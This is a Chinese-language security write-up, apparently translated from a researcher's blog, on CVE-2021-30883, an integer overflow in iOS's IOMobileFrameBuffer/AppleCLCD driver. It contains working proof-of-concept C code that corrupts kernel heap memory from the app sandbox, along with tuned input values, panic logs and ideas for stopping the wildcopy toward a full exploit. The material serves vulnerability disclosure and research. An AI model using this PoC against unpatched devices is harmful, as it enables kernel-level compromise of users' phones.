Apple发布紧急iPhone和iPad更新以修补新的零日漏洞

Apple发布紧急iPhone和iPad更新以修补新的零日漏洞

CVE-2021-30883

苹果周一发布了针对 iOS 和 iPad 的安全更新,以解决一个严重漏洞,该漏洞正在被广泛利用,这是该公司自今年年初以来在其产品中解决的第 17 个零日漏洞

关于该缺陷和攻击性质的技术细节以及威胁行为者的身份仍然不可用,以允许大多数用户应用补丁并防止其他对手将漏洞武器化。这家 iPhone 制造商表示,它通过改进内存处理解决了这个问题。

分配标识符CVE-2021-30883的弱点涉及“IOMobileFrameBuffer”组件中的内存损坏问题,该问题可能允许应用程序以内核权限执行任意代码。苹果感谢一位匿名研究人员报告了该漏洞,并表示它“知道有报告称该问题可能已被积极利用。”

Apple发布紧急iPhone和iPad更新以修补新的零日漏洞

CVE-2021-30883 POC及分析

安全研究员 Saar Amar分享了更多细节和概念验证 (PoC) 漏洞利用,指出“这个攻击面非常有趣,因为它可以从应用程序沙箱(因此非常适合越狱)和许多其他进程访问,使得它链中 LPE 漏洞的一个很好的候选者。”

针对 IOMFB 漏洞的 Bindiff 和 POC,iOS 15.0.2

介绍

在上一个 iOS 安全更新 ( 15.0.2 ) 中,Apple 修复了IOMobileFrameBuffer/AppleCLCD 中的一个漏洞,他们指出该漏洞已被广泛利用 (CVE-2021-30883)。这个攻击面非常有趣,因为它可以从应用程序沙箱(因此非常适合越狱)和许多其他进程访问,使其成为链(WebContent 等)中 LPE 漏洞利用的良好候选者。

因此,我决定快速浏览一下,绑定补丁,并确定漏洞的根本原因。在bindiffing和reversing之后,我看到这个bug很棒,我决定写这篇简短的博文,希望对你有所帮助。我真的很想在尽可能接近补丁发布的情况下发布我的 bindiff 发现,所以这里不会有完整的漏洞利用;然而,我确实设法建立了一个非常好的和稳定的 POC,最终导致了极大的恐慌:)

漏洞

首先,让我们查看修补过的函数以了解漏洞。在补丁之前,在new_from_data 的不同流中,有一些不同的大小计算实例,没有检查整数溢出。这些函数尝试分配一个缓冲区,用于存储用户发送的表格内容。

让我们以IOMFB::TableCompensator::BilerpGainTable::new_from_data 为例

在补丁之前,该函数如下所示:

__int64 __fastcall IOMFB::TableCompensator::BilerpGainTable::new_from_data(__int64 a1, __int64 a2, int a3, __int64 *a4, _QWORD *a5, int a6)
{
  __int64 v_obj; // x19
  __int64 v13; // x8
  __int64 v14; // x22
  int v15; // w8
  unsigned int v16; // w23
  __int64 v17; // x0
  __int64 v18; // x8
  __int64 v_idx; // x22

  v_obj = operator new(0x60LL);
  *(_BYTE *)(v_obj + 0x30) = 0;
  *(_QWORD *)v_obj = off_FFFFFFF0078EF1D8;
  *(_QWORD *)(v_obj + 0x58) = 0LL;
  *(_DWORD *)(v_obj + 0x50) = a6;
  *(_DWORD *)(v_obj + 0x54) = 0;
  v13 = *a4;
  *(_QWORD *)(v_obj + 0x38) = 0LL;
  *(_QWORD *)(v_obj + 0x40) = v13;
  *(_QWORD *)(v_obj + 0x48) = *a5;
  *(_DWORD *)(v_obj + 0x10) = a3;
  v14 = *(unsigned int *)(a1 + 0x140);
  *(_DWORD *)(v_obj + 32) = v14;
  if ( a3 )
    v15 = a3;
  else
    v15 = 1;
  v16 = v15 * v14;
  v_chunk = kalloc_ext((unsigned int)(12 * v15 * v14 + 4 * (v14 + a3))); // <-- WOW!
  *(_QWORD *)(v_obj + 40) = v_chunk;
  v18 = v_chunk + 12LL * v16;
  *(_QWORD *)(v_obj + 24) = v18;
  *(_QWORD *)(v_obj + 8) = v18 + 4 * v14;
  if ( a3 )
  {
    v_idx = 0LL;
    while ( IOMFB::TableCompensator::BilerpGainTable::set_table(v_obj, v_idx, a1, a2) & 1 )
    {
      v_idx = (unsigned int)(v_idx + 1);
      if ( (unsigned int)v_idx >= *(_DWORD *)(v_obj + 16) )
        return v_obj;
    }
    (*(void (__fastcall **)(__int64))(*(_QWORD *)v_obj + 8LL))(v_obj);
    v_obj = 0LL;
  }
  return v_obj;
}

每次我们看到整数计算时,我们需要小心并验证计算不能上溢或下溢。在我们的例子中,在这个函数或导致这个函数的调用堆栈中没有这样的检查。而且,最重要的是,大多数操作数完全由来自 EL0 的调用者控制 32 位。这意味着我们这里有一个经典的整数溢出。哦,计算是用 32 位完成的,而不是 64 位,这是一个很好的奖励。这是实际的代码:

FFFFFFF0098EF290 29 17 9F 1A CSINC           W9, W25, WZR, NE
FFFFFFF0098EF294 09 7D 09 1B MUL             W9, W8, W9
FFFFFFF0098EF298 96 01 80 52 MOV             W22, #0xC
FFFFFFF0098EF29C 29 7D 16 1B MUL             W9, W9, W22
FFFFFFF0098EF2A0 08 01 19 0B ADD             W8, W8, W25
FFFFFFF0098EF2A4 20 09 08 0B ADD             W0, W9, W8,LSL#2
FFFFFFF0098EF2A8 13 83 9D 97 BL              kalloc_ext

该补丁修复了这个问题(提升到 64 位算术、上限检查等),并在此过程中添加了 NULL 检查。

POC

Apple发布紧急iPhone和iPad更新以修补新的零日漏洞

与往常一样,在构建 POC 并引发良好的恐慌之前,我们不能说我们有错误。我们可以看到该错误存在于AppleMobileDispH12P 中,它可以从AppleCLCD访问。在对流程进行一些逆向和基本了解之后,我们看到可以从外部方法 78 访问此函数。可以直接从应用程序沙箱访问此流程。与之前在 IOMFB/AppleCLCD 中的普遍存在的漏洞(阅读本文)不同,不需要特殊权限。您可以使用我的 POC 创建一个 iOS 应用程序,在设备上运行它并触发漏洞.

太好了,让我们找到这些函数的流程。我选择定位IOMFB::TableCompensator::BilerpGainTable::new_from_data

正如我所说的,经过一番倒车,我看到有从流动IOMobileFramebufferUserClient :: s_set_block(第78 AppleCLCD)。

这个函数非常简单:它根据第一个标量参数调用不同的函数,这可能会继续处理包含更多“操作 ID/选择器”的用户输入,用于一些额外的 switch 语句。

我不会打扰你的细节,但为了触发IOMFB::TableCompensator::BilerpGainTable::new_from_data我只需要将第一个和第二个标量设置为 0,并将 structureInput 中的第一个 32 位值设置为 3。然后,为了验证我的反转,我在结构输入缓冲区的其余部分设置了 0x41s。通过在上面的代码片段中的 0xFFFFFFF0098EF290 上设置断点,我们可以看到 X5、X8、X20、X22 和 X25 是完全受控的 32 位整数,从结构输入中提取。惊人的!这是 0xFFFFFFF0098EF290 处通用寄存器的转储:

(lldb) reg read
General Purpose Registers:        
        x0 = 0xffffffe4cb6d95c0
        x1 = 0x0000000000000060
        x2 = 0x0000000000000040
        x3 = 0x0000000000000060
        x4 = 0x0000000000000000
        x5 = 0x0000000041414141 // <-- controlled
        x6 = 0xfffffff00991adac
        x7 = 0x0000000000006eb1
        x8 = 0x0000000041414141 // <-- controlled
        x9 = 0x000000000000003a
       x10 = 0xffffffe802080000
       x11 = 0x3ffffff932db603a
       x12 = 0x0000000000000000
       x13 = 0x00000000000001dc
       x14 = 0x0000000000004cb0
       x15 = 0x0000000000008001
       x16 = 0xffbee3f007a542d8
       x17 = 0x182effe4cb6d95c0
       x18 = 0x0000000000000000
       x19 = 0xffffffe4cb6d95c0
       x20 = 0x0000000041414141 // <-- controlled
       x21 = 0xffffffe4cd563100
       x22 = 0x0000000041414141 // <-- controlled
       x23 = 0xffffffe4cd5630f4
       x24 = 0xffffffe4cd5630ec
       x25 = 0x0000000041414141 // <-- controlled
       x26 = 0x0000000000000000
       x27 = 0xffffffe818743648
       x28 = 0xffffffe199b91608
       x29 = 0xffffffe8187434b0
       x30 = 0xfffffff0098ef23c
        sp = 0xffffffe818743470
        pc = 0xfffffff0098ef290
      cpsr = 0x20400204

从这里开始,我们显然感到恐慌。

所以,我们在计算大小时有一个 32 位整数溢出!这个大小被传递给kalloc_ext,这意味着我们可以触发内存损坏,甚至控制区域(计算中的小限制)。在许多情况下,此类错误会导致野生复制,这使我们的漏洞利用变得更加有趣()。让我们深入了解一下我们的案例中发生了什么。

因此,我构建了以下 POC,这在我尝试过的 iOS 版本上引发了恐慌(我测试了 14.7.1 和 15.0,但该错误可能比那个更旧)。

poc-概念验证:

 io_connect_t get_iomfb_uc(void) {
    kern_return_t ret;
    io_connect_t shared_user_client_conn = MACH_PORT_NULL;
    int type = 0;
    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
                                                       IOServiceMatching("AppleCLCD"));
    
    if(service == MACH_PORT_NULL) {
        printf("[-] failed to open service\n");
        return MACH_PORT_NULL;
    }
    
    printf("[*] AppleCLCD service: 0x%x\n", service);

    ret = IOServiceOpen(service, mach_task_self(), type, &shared_user_client_conn);
    if(ret != KERN_SUCCESS) {
        printf("[-] failed to open userclient: %s\n", mach_error_string(ret));
        return MACH_PORT_NULL;
    }
    
    printf("[*] AppleCLCD userclient: 0x%x\n", shared_user_client_conn);
    
    return shared_user_client_conn;
}

void do_trigger(io_connect_t iomfb_uc) {
    kern_return_t ret;
    size_t input_size = 0x180;
    
    uint64_t scalars[2] = { 0 };

    char *input = (char*)malloc(input_size);
    if (input == NULL) {
        perror("malloc input");
        return;
    }
    
    memset(input, 0x41, input_size);
    *(int*)input = 0x3;
    
    ret = IOConnectCallMethod(iomfb_uc, 78,
                        scalars, 2,
                        input, input_size,
                        NULL, NULL,
                        NULL, NULL);
    
    if (ret != KERN_SUCCESS) {
        printf("s_set_block failed, ret == 0x%x --> %s\n", ret, mach_error_string(ret));
    } else {
        printf("success!\n");
    }
    
    free(input);
}



void poc(void) {
    io_connect_t iomfb_uc = get_iomfb_uc();
    if (iomfb_uc == MACH_PORT_NULL) {
       return;
    }
    
    do_trigger(iomfb_uc);
    
    IOServiceClose(iomfb_uc);
}

而且,恐慌(来自我的物理 iPhone X、iOS 14.7.1、18G82):

  "build" : "iPhone OS 14.7.1 (18G82)",
  "product" : "iPhone10,3",
...
  "panicString" : "panic(cpu 5 caller 0xfffffff016de32d4): Kernel data abort. at pc 0xfffffff0172c4244, lr 0xfffffff0172c41b8 (saved state: 0xffffffe815d13110)
	  x0: 0xffffffe4ccd0a7c0  x1:  0x0000000000000000  x2:  0xffffffe4cd267700  x3:  0x0000000041414141
	  x4: 0x0000000000001804  x5:  0x0000000000000034  x6:  0xfffffff0172e6664  x7:  0x0000000000000000
	  x8: 0x0000000283b0de0c  x9:  0x0000000388b5e310  x10: 0x0000000041414141  x11: 0x0000000000000000
	  x12: 0x0000000000000000 x13: 0x0000000000000046  x14: 0xfffffff0172a0ac0  x15: 0xfffffff017310ed0
	  x16: 0x0000000000000001 x17: 0x0000000000000002  x18: 0xfffffff016dd1000  x19: 0xffffffe4ccd0a7c0
	  x20: 0x0000000041414141 x21: 0xffffffe4cd267700  x22: 0x0000000000000000  x23: 0x0000000035a41281
	  x24: 0x000000000000000c x25: 0x0000000041414141  x26: 0xffffffe815d13638  x27: 0xffffffe4cd3d45b4
	  x28: 0xffffffe19a0d1478 fp:  0xffffffe815d134a0  lr:  0xfffffff0172c41b8  sp:  0xffffffe815d13460
	  pc:  0xfffffff0172c4244 cpsr: 0x60400204         esr: 0x96000046          far: 0x0000000388b5e310

...
Kernel slide:      0x000000000ece0000
Kernel text base:  0xfffffff015ce4000

而且,如果我们查看物理设备内核缓存中的0xfffffff0172c4244-0x000000000ece0000

com.apple.driver.AppleMobileDispH10P:__text:FFFFFFF0085E4244                 STR             W3, [X9,W1,UXTW#2]

好吧,这很有趣。因为我们试图将控制值 (0x41414141) 写入虚拟地址 0x0000000388b5e310(这显然不是有效的内核地址),所以我们感到恐慌。实际上,这个值让我怀疑它是由分配失败引起的:kalloc_ext返回了 NULL(注意代码中没有对此进行检查),而new_from_data函数只是向新分配的块添加了一个偏移量(同样是 0x0 )。让我们看看这是怎么发生的:

错误指令位于函数IOMFB::TableCompensator::BilerpGainTable::set_table中,正如我们在第一个代码片段中看到的那样,它是从IOMFB::TableCompensator::BilerpGainTable::new_from_data 调用的。让我们看看set_table做了什么:

__int64 __fastcall IOMFB::TableCompensator::BilerpGainTable::set_table(__int64 obj, unsigned int idx, __int64 a3, int a4)
{
  int v4; // w10
  __int64 v5; // x9
  __int64 v6; // x8
  __int64 v7; // x11
  unsigned __int64 v9; // x9
  _DWORD *v10; // x10
  _DWORD *v11; // x11

  if ( *(_DWORD *)(obj + 0x10) <= idx )
    return 0LL;
  v4 = *(_DWORD *)(obj + 0x20);
  if ( *(_DWORD *)(a3 + 0x140) != v4 )
    return 0LL;
  v5 = *(_QWORD *)(obj + 8);
  v6 = *(_QWORD *)(obj + 0x18);
  v7 = *(_QWORD *)(obj + 0x28);
  if ( idx )
  {
    if ( *(_DWORD *)(v5 + 4LL * (idx - 1)) > a4 )
      return 0LL;
  }
  *(_DWORD *)(v5 + 4LL * idx) = a4;             // panic here
  if ( *(_DWORD *)(obj + 32) )
  {
    v9 = 0LL;
    v10 = (_DWORD *)(v7 + 12LL * v4 * idx);
    v11 = (_DWORD *)(a3 + 8);
    do
    {
      *(_DWORD *)(v6 + 4 * v9) = *(v11 - 2);
...

现在,被取消引用的地址是 *(X0+8),正如我们之前看到的,这是带有偏移量的分配(请记住,这里的操作数是受控的,在我的 POC 的情况下,是巨大的):

v_chunk = kalloc_ext((unsigned int)(12 * v15 * v14 + 4 * (v14 + a3)));
  *(_QWORD *)(v_obj + 40) = v_chunk;
  v18 = v_chunk + 12LL * v16;
  *(_QWORD *)(v_obj + 24) = v18;
  *(_QWORD *)(v_obj + 8) = v18 + 4 * v14;

和实际代码:

FFFFFFF0098EF290 29 17 9F 1A CSINC           W9, W25, WZR, NE
FFFFFFF0098EF294 09 7D 09 1B MUL             W9, W8, W9
FFFFFFF0098EF298 96 01 80 52 MOV             W22, #0xC
FFFFFFF0098EF29C 29 7D 16 1B MUL             W9, W9, W22
FFFFFFF0098EF2A0 08 01 19 0B ADD             W8, W8, W25
FFFFFFF0098EF2A4 20 09 08 0B ADD             W0, W9, W8,LSL#2
FFFFFFF0098EF2A8 13 83 9D 97 BL              kalloc_ext            <-- allocation
FFFFFFF0098EF2AC 60 16 00 F9 STR             X0, [X19,#0x28]
FFFFFFF0098EF2B0 68 22 40 B9 LDR             W8, [X19,#0x20]
FFFFFFF0098EF2B4 69 12 40 B9 LDR             W9, [X19,#0x10]
FFFFFFF0098EF2B8 3F 01 00 71 CMP             W9, #0
FFFFFFF0098EF2BC 2A 15 9F 1A CSINC           W10, W9, WZR, NE
FFFFFFF0098EF2C0 4A 7D 08 1B MUL             W10, W10, W8
FFFFFFF0098EF2C4 4A 01 B6 9B UMADDL          X10, W10, W22, X0
FFFFFFF0098EF2C8 6A 0E 00 F9 STR             X10, [X19,#0x18]
FFFFFFF0098EF2CC 48 09 08 8B ADD             X8, X10, X8,LSL#2
FFFFFFF0098EF2D0 68 06 00 F9 STR             X8, [X19,#8]          <-- X8 is the faulted addr

并且,在 0xFFFFFFF0098EF2AC(其中 X0 是kalloc_ext的返回值):

Process 1 stopped
* thread #1, stop reason = breakpoint 1.1
    frame #0: 0xfffffff0098ef2ac
->  0xfffffff0098ef2ac: str    x0, [x19, #0x28]          <-- X0 is kalloc_ext()'s return value
    0xfffffff0098ef2b0: ldr    w8, [x19, #0x20]
    0xfffffff0098ef2b4: ldr    w9, [x19, #0x10]
    0xfffffff0098ef2b8: cmp    w9, #0x0                  ; =0x0 
Target 0: (No executable module.) stopped.
(lldb) reg read x0
      x0 = 0x0000000000000000

极好的!这说明了一切。正如我所怀疑的,由于分配失败,之前的取消引用实际上是一个 NULL+偏移量。因此,为了利用,我们只需要选择不同的操作数,这些操作数会溢出到相对较小的数字。这将使分配成功,我们可能会开始破坏(大量)内存。

POC 可在 iOS 15.0 上运行,但也完全相同(在虚拟 iPhone 11 Pro、iOS 15.0 上测试):

一个有趣的重要说明是其他类中这些函数的其他实现也有这种整数溢出。据我所知,补丁也修复了这些问题。这并不奇怪,因为通常当我们看到一个代码模式自我重复时,它是一个内联函数/宏/等。

Exploitation

我只是绑定了这个错误,所以这篇博文中不会有完整的漏洞利用;但是,我们仍然可以大体上讨论野拷贝的利用并改进 POC 为利用奠定基础:) 但是在我们开始谈论野拷贝之前,让我先分享一些 POC,它们可以让我们更好地控制流程并触发良好的恐慌。

Apple发布紧急iPhone和iPad更新以修补新的零日漏洞

控制操作数

首先,让操作数取自的偏移量中设置任意值(而不是在整个输入中设置 0x41s)。这里没有什么令人兴奋的;它只是反转IOMFB::TableCompensator::BilerpGainTable::new_from_data的调用者函数。POC 中更新的部分:

...
    memset(input, 0x0, input_size);
    int *pArr = (int*)input;

    pArr[0] = 0x3;          // sub-sub selector
    pArr[1] = 0xffffffff;   // has to be non-zero
    pArr[2] = 0x41414141;
    pArr[3] = 0x42424242;
    pArr[8] = 0x43434343;
    pArr[89] = 0x44444444;
    
    ret = IOConnectCallMethod(iomfb_uc, 78,
                        scalars, 2,
                        input, input_size,
                        NULL, NULL,
                        NULL, NULL);
...

这给出了以下寄存器(对于与上面相同的存根,虚拟 iPhone 11 Pro,iOS 14.7.1):

(lldb) reg read
General Purpose Registers:
        x0 = 0xffffffe4cbaa4420
        x1 = 0x0000000000000060
        x2 = 0x0000000000000020
        x3 = 0x0000000000000060
        x4 = 0x0000000000000000
        x5 = 0x0000000043434343 // <-- controlled
        x6 = 0xfffffff00991adac
        x7 = 0x0000000000006eb1
        x8 = 0x0000000044444444 // <-- controlled
        x9 = 0x000000000000000b
       x10 = 0xffffffe802224000
       x11 = 0x3ffffff932ea900b
       x12 = 0x0000000000000000
       x13 = 0x00000000000001dc
       x14 = 0x0000000000003320
       x15 = 0x0000000000008001
       x16 = 0xffbd7ff007a542d8
       x17 = 0x182effe4cbaa4420
       x18 = 0x0000000000000000
       x19 = 0xffffffe4cbaa4420
       x20 = 0x0000000042424242 // <-- controlled
       x21 = 0xffffffe4ccf02b00
       x22 = 0x0000000043434343 // <-- controlled
       x23 = 0xffffffe4ccf02af4
       x24 = 0xffffffe4ccf02aec
       x25 = 0x0000000041414141 // <-- controlled
       x26 = 0x0000000000000000
       x27 = 0xffffffe81869b648
       x28 = 0xffffffe199dd5608
       x29 = 0xffffffe81869b4b0
       x30 = 0xfffffff0098ef23c
        sp = 0xffffffe81869b470
        pc = 0xfffffff0098ef290
      cpsr = 0x20400204

更好的恐慌,即 – NOT a (NULL+offset) dereference

现在,我想做的第一件事是获得更好的恐慌:即恐慌表明我们可以以一种好的方式破坏记忆(好吧,对我们来说)。NULL+offset 的错误取消引用(具有小而有限的偏移量)只是一个 DOS,这对我们来说还不够好(这不是安全问题)。所以,如果我们只是将我的 POC 调整为如下所示:

    memset(input, 0x41, input_size);
    int *pArr = (int*)input;

    pArr[0] = 0x3;          // sub-sub selector
    pArr[1] = 0xffffffff;   // has to be non-zero
    pArr[2] = 0x10008;
    pArr[3] = 0x424242;
    pArr[8] = 0x434343;
    pArr[89] = 0x444444;

我们得到了更好的恐慌(再次,我的物理 iPhone X、iOS 14.7.1、18G82):

  "build" : "iPhone OS 14.7.1 (18G82)",
  "product" : "iPhone10,3",
...
  "panicString" : "panic(cpu 5 caller 0xfffffff02747b2d4): Kernel data abort. at pc 0xfffffff02795c244, lr 0xfffffff02795c1b8 (saved state: 0xffffffe8042f3110)
	  x0: 0xffffffe4cb295da0  x1:  0x0000000000000000  x2:  0xffffffe4cd4d4700  x3:  0x0000000000424242
	  x4: 0xffffffe8042f32c0  x5:  0xffffffe8042f32bc  x6:  0x0000000000000001  x7:  0x0000000000000009
	  x8: 0xffffffec51659980  x9:  0xffffffec5276aa90  x10: 0x0000000000444444  x11: 0xffffffe9049c0000
	  x12: 0x00000000004a0000 x13: 0x00000000ffdfffff  x14: 0xfffffff028729000  x15: 0xaaaaaaaaaaaaaaab
	  x16: 0x0000002000000000 x17: 0xfffffff028729940  x18: 0xfffffff027469000  x19: 0xffffffe4cb295da0
	  x20: 0x0000000000424242 x21: 0xffffffe4cd4d4700  x22: 0x0000000000000000  x23: 0x0000000046662220
	  x24: 0x000000000000000c x25: 0x0000000000010008  x26: 0xffffffe8042f3638  x27: 0xffffffe4cd51df44
	  x28: 0xffffffe199c1d478 fp:  0xffffffe8042f34a0  lr:  0xfffffff02795c1b8  sp:  0xffffffe8042f3460
	  pc:  0xfffffff02795c244 cpsr: 0x60400204         esr: 0x96000046          far: 0xffffffec5276aa90
...
Kernel slide:      0x000000001f378000
Kernel text base:  0xfffffff02637c000

好多了。注意PC和之前一样(0xfffffff02795c244-0x000000001f378000==0xFFFFFFF0085E4244),但是这次dst基地址是X9=0xffffffec5276aa90。我们仍然在循环的第一个索引(X1=0)上崩溃,因为偏移量太大。那是因为我们没有明智地选择其他任意值。让我们解决这个问题。

更好的恐慌 – 经典野生复制的 POC

所以一切都很好,我们完全了解发生了什么。但这还不够。我们需要得到一个好的恐慌,表明我们破坏了任意内存(我们可以通过整形等控制)。写入未映射页面的恐慌是一个好的第一步,但还有更多的工作要做。因为看起来我们在这里进入了一个wildcopy情况,让我们选择好的参数,这样:

  • 我们得到了一个“合理”的分配大小(尽管它可能仍然很高)
  • 我们从分配中得到一个合理的偏移量
  • 我们开始损坏内存并在一段时间后在未映射的页面上崩溃(即,我们在恐慌之前成功损坏了一些内存)

这对于通配符来说可能是一个很好的 POC。然后,我们只需要弄清楚如何停止野生复制并利用损坏(见下一节)。

所以,在这个新的 POC 中,分配大小仍然很大,但是分配确实成功了:

    memset(input, 0x41, input_size);
    int *pArr = (int*)input;

    pArr[0] = 0x3;          // sub-sub selector
    pArr[1] = 0xffffffff;   // has to be non-zero
    pArr[2] = 0x10008;
    pArr[3] = 0x424242;
    pArr[8] = 0x434343;
    pArr[89] = 0x10008;

和恐慌:

  "build" : "iPhone OS 14.7.1 (18G82)",
  "product" : "iPhone10,3",
...
  "panicString" : "panic(cpu 5 caller 0xfffffff02585b2d4): Kernel data abort. at pc 0xfffffff025d3c270, lr 0xfffffff025d3c1b8 (saved state: 0xffffffe816513110)
	  x0: 0xffffffe4cc8dfcc0  x1:  0x0000000000000010  x2:  0xffffffe4cd012e00  x3:  0x0000000000424242
	  x4: 0xffffffe8165132c0  x5:  0xffffffe8165132bc  x6:  0x0000000000000001  x7:  0x0000000000000009
	  x8: 0xffffffe904720300  x9:  0x000000000000af80  x10: 0xffffffe9047a4000  x11: 0xffffffe4cd0c2608
	  x12: 0x0000000063736944 x13: 0x00000000ffdfffff  x14: 0xffffffe8044e8000  x15: 0xaaaaaaaaaaaaaaab
	  x16: 0x0000002000000000 x17: 0xfffffff026b09940  x18: 0xfffffff025849000  x19: 0xffffffe4cc8dfcc0
	  x20: 0x0000000000424242 x21: 0xffffffe4cd012e00  x22: 0x0000000000000010  x23: 0x0000000000100040
	  x24: 0x000000000000000c x25: 0x0000000000010008  x26: 0xffffffe816513638  x27: 0xffffffe4cd0f38d4
	  x28: 0xffffffe199edd478 fp:  0xffffffe8165134a0  lr:  0xfffffff025d3c1b8  sp:  0xffffffe816513460
	  pc:  0xfffffff025d3c270 cpsr: 0x80400204         esr: 0x96000047          far: 0xffffffe9047a4000
...
Kernel slide:      0x000000001d758000
Kernel text base:  0xfffffff02475c000

哦,新指令!实际上,与我们上次恐慌时的情况相差不远。我们在循环中崩溃(在IOMFB::TableCompensator::BilerpGainTable::set_table 中)。地址为 0xfffffff025d3c270-0x000000001d758000=0xfffffff0085e4270。循环如下(来自 iPhone X,iOS 14.7.1):

FFFFFFF0085E4264
FFFFFFF0085E4264 loop
FFFFFFF0085E4264 LDUR            W12, [X11,#-8]
FFFFFFF0085E4268 STR             W12, [X8,X9,LSL#2]
FFFFFFF0085E426C LDUR            W12, [X11,#-4]
FFFFFFF0085E4270 STR             W12, [X10]           <-- panic here
FFFFFFF0085E4274 LDR             W12, [X11]
FFFFFFF0085E4278 STR             W12, [X10,#4]
FFFFFFF0085E427C LDR             W12, [X11,#4]
FFFFFFF0085E4280 STR             W12, [X10,#8]
FFFFFFF0085E4284 ADD             X9, X9, #1           <-- inc index
FFFFFFF0085E4288 LDR             W12, [X0,#0x20]
FFFFFFF0085E428C ADD             X11, X11, #0x10
FFFFFFF0085E4290 ADD             X10, X10, #0xC
FFFFFFF0085E4294 CMP             X9, X12              <-- cmp index to cnt
FFFFFFF0085E4298 B.CC            loop

我们可以看到关于这次崩溃的两个要点:

  • X9(循环中的计数器)是 0xaf90(这个循环之前被调用了很多次)。
  • X10,被取消引用的地址,被分页对齐 – 0xffffffe9047a4000。这意味着我们到达了一个非地图区域。

这几乎是我对经典的wildcopy 崩溃所期望的(当然,没有适当的形状&&exploit :))。

通配符利用

现在,让我们进入有趣的部分:停止通配符。正如我在之前的漏洞利用中所说,我们可以在这里采取不同的方法。让我们看一些例子:

  1. 依赖竞争条件——塑造堆并触发通配符,这样它就会破坏一些有用的目标结构,并在通配符使我们崩溃之前竞争一个不同的线程来使用这个损坏的结构来做一些事情(例如,构造其他原语,终止通配符等)。一个很好的例子可以在这里找到。
  2. 如果wildcopy循环/机制有一些逻辑可以在某些条件下停止循环,我们可以利用这些检查并在wildcopy破坏我们想要破坏的数据/结构后破坏wildcopy。这正是我在WSL 漏洞利用中采用的方法。这种技术可以使用许多不同的方法来实现,例如:
    • 如果从不应更改的内存中进行双取,或者可以更改,但有检查到位(因此由于双取的存在不存在安全问题,但逻辑确实是双取) ,我们可以利用这种双重提取并打破循环。请记住,我们并不关心该功能是否会导致错误,只要这发生在我们破坏了所需的目标结构之后。
  3. 如果wildcopy循环在每次迭代中都调用了一个虚函数,并且该函数指针存储在堆上的一个结构中(或在wildcopy期间我们可能会破坏的其他内存地址),则漏洞利用可以使用循环覆盖和在通配符期间转移执行。

在我们的特殊情况下,我看到了一些基于逻辑从内存中读取的值的检查(例如,在我们在IOMFB::TableCompensator::BilerpGainTable::set_table 中得到第一个恐慌之前检查分支)。请记住,只要set_table返回 value != 0,new_from_data 中的循环就会继续运行(即,wildcopy 继续运行)。你可以再看看这篇博文开头的反编译代码。所以任何从set_table返回 0 的分支都有利于我们停止通配符。记住这一点以备后用;这很重要!

另一个重要的点:set_table从内存中获取的一些值将是 OOB:记住,我们分配了一个非常小的内存块(大小仅 32 位),我们将其视为 >4GB。

所以,我想要做的是在某个时间点(当然,在某些数据已损坏之后)更改一个已检查的值并停止复制。有很多方法可以做到这一点,但我认为最简单的方法之一是塑造内核堆,以便在共享内存之前分配易受攻击的块,我们可以在任意时间从 EL0 更改共享内存。同样,补丁刚刚发布,所以我显然还没有测试它,但只是我发现在许多类似情况下非常有用的一个想法。

大恐慌!

所以,正如我所说,我们应该建立一个良好的形状并使用我提到的条件分支来阻止野复制。这些分支使用从 OOB 读取的值,我们可以对堆进行整形,因此我们将从共享内存/受控内存/等读取这些值。具体示例,请查看我上面链接的 WSL 漏洞利用。

问题是我想在尽可能接近补丁发布的时候发布这篇博文,所以我现在不会这样做。相反,我想出了一个很好的主意,碰巧效果很好(令人惊讶)。我在物理设备(iPhone X、iOS 14.7.1)和虚拟设备(iPhone 11 Pro、iOS 15.0)上连续测试了 5 次,并且每次都以相同的方式在两种设备上运行。所以,鉴于它有 100% 的成功率,而且我总是得到我想要的同样的恐慌,我也会在这里分享它:)

在深入的想法之前,让我们只记住,new_from_data电话set_table在一个循环中,如果调用的一个set_table返回0,我们摆脱困境。此外,set_table在开始时做了一些条件分支,然后才开始复制循环。并且,如果这些条件分支之一未通过,则 set_table 返回 0。如果它们都通过,则复制循环开始。您可以在本博文开头的反编译代码中清楚地看到这一点。

因此,想法很简单:让我们选择具有以下属性的数字:

  1. 进行溢出计算以产生一个小而通用的大小(我选择了 0x44)
  2. 使wildcopy由许多循环构建,每个循环复制少量字节,而不是少量循环,每次复制大量字节。这显着增加了可以让我们摆脱通配副本的检查次数,我们只能希望堆中的随机内容将我们从副本中解脱出来(同样,适当的整形会以正确的方式做到这一点,但是补丁在 2 小时前发布了。所以,让我们测试一下:P)。

事实证明,这种方法“太有效了”,因为在大多数情况下,我们过早地退出了应对循环(即我们写了很少量的字节 OOB 分配),并且,在一个在少数情况下,我们会退出函数并在损坏开始之前停止(然后,没有任何崩溃)。但是在我连续运行几次 POC 应用程序之后,我得到了我想要的好恐慌!所以,我只是把它包裹在一个循环中,我想要的好恐慌一直在发生!

我还在set_table的“return 0”中设置了一个断点,我看到了这种情况。您还可以使用调试器查看每次调用s_set_block 时确切损坏的字节

现在,到 POC!通过逆向调试,很容易看出 pArr[89] 是IOMFB::TableCompensator::BilerpGainTable::set_table 中复制循环的迭代次数。因此,我选择了在new_from_data中为我提供了大量迭代的数字,每个都在set_table 中调用一个小循环,并且整数溢出导致 0x44。通过更改 POC 中的相关部分:

    // we control the content we are corrupting with
    memset(input, 0x41, input_size);
    int *pArr = (int*)input;

    pArr[0] = 0x3;          // sub-sub selector
    pArr[1] = 0xffffffff;   // has to be non-zero
    pArr[2] = 0x40000001;   // #iterations in the outer loop (new_from_data)
    pArr[3] = 2;
    pArr[8] = 2;
    pArr[89] = 4;           // #iterations in the inner loop (set_table)
    
    /* each call trigger a flow with a lot of calls to set_table(), while
       each set_table() flow will do a loop of only 4 iterations*/
    for (size_t i = 0; i < 0x10000; ++i) {
        ret = IOConnectCallMethod(iomfb_uc, 78,
                            scalars, 2,
                            input, input_size,
                            NULL, NULL,
                            NULL, NULL);
    }

而且,在物理设备 iPhone X 14.7.1 上,我总是感到恐慌(它在虚拟 iPhone 11 Pro 14.7.1/15.0 上的行为完全相同):

  "build" : "iPhone OS 14.7.1 (18G82)",
  "product" : "iPhone10,3",
...
  "panicString" : "panic(cpu 5 caller 0xfffffff01ad1d050): [kext.kalloc.80]: element modified after free (off:0, val:0x4141414141414141, sz:80, ptr:0xffffffe4cb9780f0, prot:zero)
    0: 0x4141414141414141
    8: 0x4141414141414141
...
Kernel slide:      0x0000000012c1c000
Kernel text base:  0xfffffff019c20000

是的!极好的!同样的恐慌发生在虚拟 iPhone 11 Pro、15.0、19A344 上:

